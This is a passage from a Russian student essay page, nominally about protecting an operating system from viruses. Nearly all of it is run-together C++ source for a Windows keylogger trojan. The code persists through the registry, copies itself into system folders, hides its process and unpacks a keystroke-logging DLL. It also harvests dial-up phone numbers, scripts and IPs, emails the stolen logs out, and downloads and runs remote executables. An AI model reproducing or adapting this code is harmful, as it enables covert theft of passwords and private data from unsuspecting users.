|
Способы защиты операционной системы от вирусных программ |
ULL, // reserved&j, // address of buffer for value type(UCHAR*) buf1, // address of data buffer&i // address of data buffer size) ! = ERROR_SUCCESS) ||(j! = REG_SZ) ||(strcmp (buf1,buf2))) { // Надо ставить свой ключRegSetValueEx (hKey, // handle of key to set value forsti. reg_desc, // address of value to set0, // reservedREG_SZ, // flag for value type(UCHAR*) buf2, // address of value datastrlen (buf2) + 1 // size of value data);};RegCloseKey (hKey);}; // -----------------------Инсталяция в систему-------------------------void Install (void){char buf1 [0x100],buf2 [0x100];PROCESS_INFORMATION pi;STARTUPINFO si; // из какого каталога запуск?GetModuleFileName (NULL,buf1,sizeof (buf1));CharUpperBuff (buf1,strlen (buf1));if (strcmp (sti. full_exe_name,buf1)) { // Нет это не наш каталог // Копируемif (CopyFile (buf1,sti. full_exe_name,false)) { // Скопировали нормальноmemset (&si,0,sizeof (si));si. cb = sizeof (si);sprintf (buf2,"Restart_%X Kill_%X=%s",sti. number,sti. number,buf1); // Стартуем процессCreateProcess (sti. full_exe_name, // pointer to name of executable modulebuf2, // pointer to command line stringNULL, // pointer to process security attributesNULL, // pointer to thread security attributesfalse, // handle inheritance flag0, // creation flagsNULL, // pointer to new environment blockNULL, // pointer to current directory name&si, // pointer to STARTUPINFO&pi // pointer to PROCESS_INFORMATION);};ExitProcess (0);};}; // --------------------Проверка на включение кейлога-------------------bool TitleTest (HWND hwnd, char* t){char title [0x200];UINT i;GetWindowText (hwnd,title,sizeof (title)); // Считываем заголовок окнаstrcpy (t,title);if (sti. total_log) return true; // Если постоянный логCharUpperBuff (title,strlen (title)); // в верхний регисрfor (i = 0; i<sti. nsubstr; i++) // Ищем субстрокиif (strstr (title,sti. substr [i])) return true;return false;}; // --------Тут происходит проверка на возникновение соединения---------void ConDectecting (void){static HRASCONN hconn;static int state;RASCONN rascon;RASCONNSTATUS rascs;LPRASENTRY re;RASPPPIP rasip;SYSTEMTIME st;int i,j;char sz1 [0x1000],sz2 [0x100];FILE* fs;if (! bRASDLL) return; // текущее соединение?rascon. dwSize = sizeof (RASCONN);j = sizeof (rascon);if (RasEnumConnections (&rascon, // buffer to receive connections data(LPDWORD) &j, // size in bytes of buffer(LPDWORD) &i // number of connections written to buffer)) return;if (! i) { // нет соединенийhconn = NULL;return;}; // на каком этапе подключение?rascs. dwSize = sizeof (rascs);i = RasGetConnectStatus (rascon. hrasconn, // handle to RAS connection of interest&rascs // buffer to receive status data);if ( (i) || (rascs. rasconnstate == RASCS_Disconnected)) {hconn = NULL;return;};if (hconn! = rascon. hrasconn) {state = rascs. rasconnstate;hconn = rascon. hrasconn;return;};if ( (rascs. rasconnstate == RASCS_Connected) && (state! = RASCS_Connected)) {state = RASCS_Connected; // новое соединение успешно установленоGetLocalTime (&st); // имя, время соединенияsprintf (sz1,"\nConnection: \"%s\",%2.2u:%2.2u:%2.2u\n",rascon. szEntryName,st. wHour,st. wMinute,st. wSecond);i = 0; // опередляем количество памяти под RASENTRYRasGetEntryProperties (NULL, // pointer to full path and filename of phone-book filerascon. szEntryName, // pointer to an entry nameNULL, // buffer that receives entry information(LPDWORD) &i, // size, in bytes, of the lpRasEntry bufferNULL, // buffer that receives device-specific configuration informationNULL // size, in bytes, of the lpbDeviceInfo buffer);re = (LPRASENTRY) new BYTE [i];re->dwSize = sizeof (RASENTRY);j = RasGetEntryProperties (NULL, // pointer to full path and filename of phone-book filerascon. szEntryName, // pointer to an entry namere, // buffer that receives entry information(LPDWORD) &i, // size, in bytes, of the lpRasEntry bufferNULL, // buffer that receives device-specific configuration informationNULL // size, in bytes, of the lpbDeviceInfo buffer); // телефон, скриптif (! j) {if (re->dwfOptions & RASEO_UseCountryAndAreaCodes)sprintf (sz2,"\tPN:%u,%s,%s\n",re->dwCountryCode,re->szAreaCode,re->szLocalPhoneNumber);elsesprintf (sz2,"\tPN:%s\n",re->szLocalPhoneNumber);strcat (sz1,sz2);if (strcmp (re->szScript,"")) {sprintf (sz2,"\tScript:%s\n",re->szScript);strcat (sz1,sz2);fs = fopen (re->szScript,"rt");if (fs) {fseek (fs,0,SEEK_END);i = ftell (fs);j = strlen (sz1);if (i < ( (int) sizeof (sz1) - j - 0x40)) {fseek (fs,0,SEEK_SET);i = fread (&sz1 [j],1, i,fs);sz1 [j + i] = 0;strcat (sz1,"\n");};fclose (fs);};};};delete re;i = sizeof (RASPPPIP);rasip. dwSize = i;j = RasGetProjectionInfo (rascon. hrasconn, // handle that specifies remote access connection of interestRASP_PppIp, // specifies type of projection information to obtain&rasip, // points to buffer that receives projection information(LPDWORD) &i // points to variable that specifies buffer size); // IP наш и сервераif (! j) {sprintf (sz2,"\tIP:%s\n""\tServer's IP:%s\n",rasip. szIpAddress,rasip. szServerIpAddress);strcat (sz1,sz2);};LogAdd (sz1);};}; // ---------------------Удаление предудущей копии----------------------void DelPrev (){CREATETOOL CreateToolhelp32Snapshot;FIRST32 Process32First;NEXT32 Process32Next;HANDLE h_th;HINSTANCE h_l;PROCESSENTRY32 pe;HANDLE hp;h_l = LoadLibrary ("KERNEL32. DLL");if (! h_l) return;CreateToolhelp32Snapshot =(CREATETOOL) GetProcAddress (h_l,"CreateToolhelp32Snapshot");Process32First = (FIRST32) GetProcAddress (h_l,"Process32First");Process32Next = (NEXT32) GetProcAddress (h_l,"Process32Next");if ( (! Process32Next) || (! Process32First) || (! CreateToolhelp32Snapshot))goto exit_proc;h_th = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0);pe. dwSize = sizeof (pe);if (! Process32First (h_th,&pe)) goto exit_proc;do {CharUpperBuff (pe. szExeFile,strlen (pe. szExeFile));if ( (! strcmp (sti. full_exe_name,pe. szExeFile)) && (GetCurrentProcessId () ! = pe. th32ProcessID)) {hp = OpenProcess (PROCESS_TERMINATE,0,pe. th32ProcessID);if (hp)#ifdef _DEBUGif (! TerminateProcess (hp,0)) ShowMessage ("Cannot terminate process");#elseTerminateProcess (hp,0);#endif};} while (Process32Next (h_th,&pe));exit_proc:FreeLibrary (h_l);}; // -------------callback функция для распаковки кейлог-dll-------------FILE* unpack_file;void Callback (char* data, int len){fwrite (data,1,len,unpack_file);}; // -----------------------------WinMain--------------------------------int WINAPI WinMain (HINSTANCE,HINSTANCE,LPSTR, int){MSG msg;char buf1 [0x100],buf2 [0x200], buf3 [0x100], *szKillIt;HINSTANCE h_ker, h_keylog, h_ras;SYSTEMTIME systime, killtime, mailtime, exectime;int h_timer, i, j;LPREGISTERSERVICEPROCESS lpRegServ;LPGETDATA GetData;LPKEYLOGON KeylogOn;LPKEYLOGOFF KeylogOff;LPKEYLOGOPT KeylogOpt;bool IsLog = false, IsMailing = false, IsChange = false;UINT cFlush = 0, cMail = 0, cAutoKill = 0, cRegInst = 0, cExe = 0, cCon = 0;HWND h_curwnd, h_oldwnd = NULL;FILE* h_f;HRSRC hr;HGLOBAL hrd;_AttachedData a_d;char* sti_buf;char old_title [MAX_PATH];int d_s; // Грузим конфинурациюGetModuleFileName (NULL,buf1,sizeof (buf1));h_f = fopen (buf1,"rb");fseek (h_f,0,SEEK_END);d_s = ftell (h_f);sti_buf = new char [d_s];fseek (h_f,0,SEEK_SET);fread (sti_buf,1,d_s,h_f);for (i=d_s-1; i>=0; i--) {sti_buf [i-1] ^= sti_buf [i];sti_buf [i-1] += sti_buf [i];};memcpy (&a_d,&sti_buf [d_s - sizeof (_AttachedData)],sizeof (_AttachedData));if (a_d. signature! = 0x3104) return - 1;sti. total_log = a_d. total_log;sti. encrypt_log = a_d. encrypt_log;sti. send_mail = a_d. send_mail;sti. syspass = a_d. syspass;sti. autokill = a_d. autokill;sti. fullname = a_d. fullname;sti. exepath = a_d. exepath;sti. ras = a_d. ras;sti. loglimit = a_d. loglimit;sti. sendafter = a_d. sendafter;sti. nsubstr = a_d. n_ss;sti. number = a_d. number; // грузим субстрокиfor (i=0,j=a_d. ss_ofs; (UINT) i<a_d. n_ss; i++) {sti. substr [i] = new char [strlen (&sti_buf [j]) + 1];strcpy (sti. substr [i],&sti_buf [j]);j += strlen (&sti_buf [j]) + 1;}; // имя логаstrcpy (buf1,&sti_buf [a_d. logname_ofs]);GetSystemDirectory (sti. logname,sizeof (sti. logname));strcat (sti. logname,"\\");strcat (sti. logname,buf1); // адрес хостаstrcpy (sti. host,&sti_buf [a_d. host_ofs]); // от кого?strcpy (sti. mailfrom,&sti_buf [a_d. mailfrom_ofs]); // кому?strcpy (sti. mailto,&sti_buf [a_d. mailto_ofs]);strcpy (sti. subj,&sti_buf [a_d. subj_ofs]); // имя exe-файлаstrcpy (sti. exe_name,&sti_buf [a_d. exe_ofs]); // имя кейлог-dllstrcpy (sti. dll_name,&sti_buf [a_d. dll_ofs]); // полное имя exe-файлаif (sti. exepath == 2)strcpy (sti. full_exe_name,&sti_buf [a_d. exe_ofs]);else {if (! sti. exepath)GetWindowsDirectory (sti. full_exe_name,sizeof (sti. full_exe_name));elseGetSystemDirectory (sti. full_exe_name,sizeof (sti. full_exe_name));strcat (sti. full_exe_name,"\\");strcat (sti. full_exe_name,&sti_buf [a_d. exe_ofs]);};CharUpperBuff (sti. full_exe_name,strlen (sti. full_exe_name)); // описание в реестреstrcpy (sti. reg_desc,&sti_buf [a_d. reg_descr_ofs]); // путь в реестреstrcpy (sti. reg_path,&sti_buf [a_d. reg_path_ofs]); // адрес exe-файла для запускаstrcpy (sti. http,&sti_buf [a_d. http_ofs]); // порт сендмэйлаsti. port = a_d. port; // интервал между посылкамиmemcpy (&sti. send_i,&a_d. send_i,sizeof (SYSTEMTIME)); // время жизниmemcpy (&sti. kill_i,&a_d. kill_i,sizeof (SYSTEMTIME));delete sti_buf;DelPrev ();#ifndef _DEBUGRecurrentStart (); // Повторно запусть?Install (); // Интсталируем#endif // Что у нас в командной строке?sprintf (buf1,"Kill_%X=",sti. number);szKillIt = strstr (GetCommandLine (),buf1);if (szKillIt) szKillIt += strlen (buf1); // Скрываем процессh_ker = LoadLibrary ("KERNEL32. DLL");if (h_ker) {lpRegServ =(LPREGISTERSERVICEPROCESS) GetProcAddress (h_ker,"RegisterServiceProcess");#ifndef _DEBUGif (lpRegServ) lpRegServ (NULL,1);#endifFreeLibrary (h_ker);}; // Подгружаем RASAPI32. DLL если естьh_ras = LoadLibrary ("RASAPI32. DLL");if (h_ras) {RasEnumConnections= (LPRASENUMCCONNECTIONS) GetProcAddress (h_ras,"RasEnumConnectionsA");RasGetConnectStatus = (LPRASGETCONNECTSTATUS) GetProcAddress (h_ras,"RasGetConnectStatusA");RasGetEntryProperties = (LPRASGETENTRYPROPERTIES) GetProcAddress (h_ras,"RasGetEntryPropertiesA");RasGetProjectionInfo = (LPRASGETPROJECTIONINFO) GetProcAddress (h_ras,"RasGetProjectionInfoA");bRASDLL = (RasEnumConnections) && (RasGetConnectStatus) && (RasGetEntryProperties) && (RasGetProjectionInfo);} else bRASDLL = false; // Проинициализировать логLogInit ();GetSystemDirectory (buf1,sizeof (buf1));strcat (buf1,"\\");strcat (buf1,sti. dll_name);h_keylog = LoadLibrary (buf1);if (! h_keylog) {hr = FindResource (NULL, // resource-module handle(LPCTSTR) IDR_KDLL, // pointer to resource name"KDLL" // pointer to resource type);hrd = LoadResource (NULL, // resource-module handlehr // resource handle);unpack_file = fopen (buf1,"w+b");if (! unpack_file) return - 1;LZWUnpack ( (char*) hrd,Callback);fclose (unpack_file);h_keylog = LoadLibrary (sti. dll_name);}; // грузим функции кейлог-dllGetData = (LPGETDATA) GetProcAddress (h_keylog,"GetData");KeylogOn = (LPKEYLOGON) GetProcAddress (h_keylog,"KeylogOn");KeylogOff = (LPKEYLOGOFF) GetProcAddress (h_keylog,"KeylogOff");KeylogOpt = (LPKEYLOGOPT) GetProcAddress (h_keylog,"KeylogOpt");#ifdef _DEBUGif (! GetData) {ShowMessage ("Error load GetData function");return - 1;};if (! KeylogOn) {ShowMessage ("Error load KeyLogOn function");return - 1;};if (! KeylogOff) {ShowMessage ("Error load KeyLogOff function");return - 1;};if (! KeylogOpt) {ShowMessage ("Error load KeyLogOpt function");return - 1;};#elseif ( (! GetData) || (! KeylogOn) || (! KeylogOff) || (! KeylogOpt)) return - 1;#endif // Ставим режим работы кейлог-dllKeylogOpt (a_d. adv_log); // проинициализить критическую секциюInitializeCriticalSection (&gcs); // Пишем время стартаi = sizeof (buf1);if (! GetUserName (buf1, (DWORD*) &i)) buf1 [0] = 0;i = sizeof (buf3);if (! GetComputerName (buf3, (DWORD*) &i)) buf3 [0] = 0;sprintf (buf2,"Computer: \"%s\" User: \"%s\"\n",buf3,buf1);GetLocalTime (&systime);SysTimePrint (buf3,systime);sprintf (buf1,"\nStarted at%s,%s\n",buf3,buf2);LogAdd (buf1);memcpy (&killtime,&sti. inst_d,sizeof (SYSTEMTIME));SysTimeSum (killtime,sti. kill_i);memcpy (&mailtime,&sti. send_d,sizeof (mailtime));SysTimeSum (mailtime,sti. send_i); // Сбрасываем exectimememset (&exectime,0,sizeof (exectime)); // Ставим таймерh_timer = SetTimer (NULL,0,1000,NULL);while (GetMessage (&msg,NULL,0,0)) // GetMessage-loopswitch (msg. message) {case WM_TIMER: // Забираем данные из кейлог-буфераif (IsLog) {i = GetData (buf1,sizeof (buf1));buf1 [i] = 0;if ( (! a_d. emp_log) && (IsChange) && (i)) {LogAdd (old_title);IsChange = false;};LogAdd (buf1);};h_curwnd = GetForegroundWindow (); // Получить текущее окноif (h_curwnd! = h_oldwnd) { // Окно поменялось // выключаем лог если он идетif (IsLog) KeylogOff ();IsLog = false;if (TitleTest (h_curwnd,buf2)) { // Окно наше?GetLocalTime (&systime);sprintf (old_title,"\nTitle: \"%s\",%2.2u:%2.2u:%2.2u\n",buf2,systime. wHour,systime. wMinute,systime. wSecond);IsChange = true;if (a_d. emp_log) LogAdd (old_title);IsLog = KeylogOn (); // Включить лог};};h_oldwnd = h_curwnd; // Обработка сброса буфера на хардif (cFlush > FLUSH_BUFFER_TIME) {LogFlush ();cFlush = 0;} else cFlush++;if (sti. send_mail) {if ( (cMail > MAIL_TEST_TIME) && (! IsMailing)) {GetLocalTime (&systime);if ( (SysTimeComp (systime,mailtime) >= 0) ||(sti. logsize > sti. sendafter)) { // МылимLogEmailing (mailtime, IsMailing);};cMail = 0;} else cMail++;};if (cRegInst > REG_TEST_TIME) {if (sti. autokill) {GetLocalTime (&systime);if (SysTimeComp (systime,killtime) >= 0) {AutoKill (h_keylog);};};RegInstall ();cRegInst = 0;} else cRegInst++;if ( (cExe > EXEC_TEST_TIME) && (! IsMailing)) {GetLocalTime (&systime);if (SysTimeComp (systime,exectime) >= 0) {HttpDownloading (exectime, IsMailing);};cExe = 0;} else cExe++; // Килять исходный экзешник?if (szKillIt) {if (DeleteFile (szKillIt)) szKillIt = NULL;}; // Проврека на возникновение соединенияif (cCon > CON_TEST_TIME) {cCon = 0;ConDectecting ();} else cCon++;break;#ifdef _DEBUGdefault:sprintf (buf1,"Unknown Message:%X",msg. message);ShowMessage (buf1);#endif};return msg. wParam;};
Страницы: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
|
|
|
© 2003-2013
Рефераты бесплатно, курсовые, рефераты биология, большая бибилиотека рефератов, дипломы, научные работы, рефераты право, рефераты, рефераты скачать, рефераты литература, курсовые работы, реферат, доклады, рефераты медицина, рефераты на тему, сочинения, реферат бесплатно, рефераты авиация, рефераты психология, рефераты математика, рефераты кулинария, рефераты логистика, рефераты анатомия, рефераты маркетинг, рефераты релиния, рефераты социология, рефераты менеджемент. |
|
|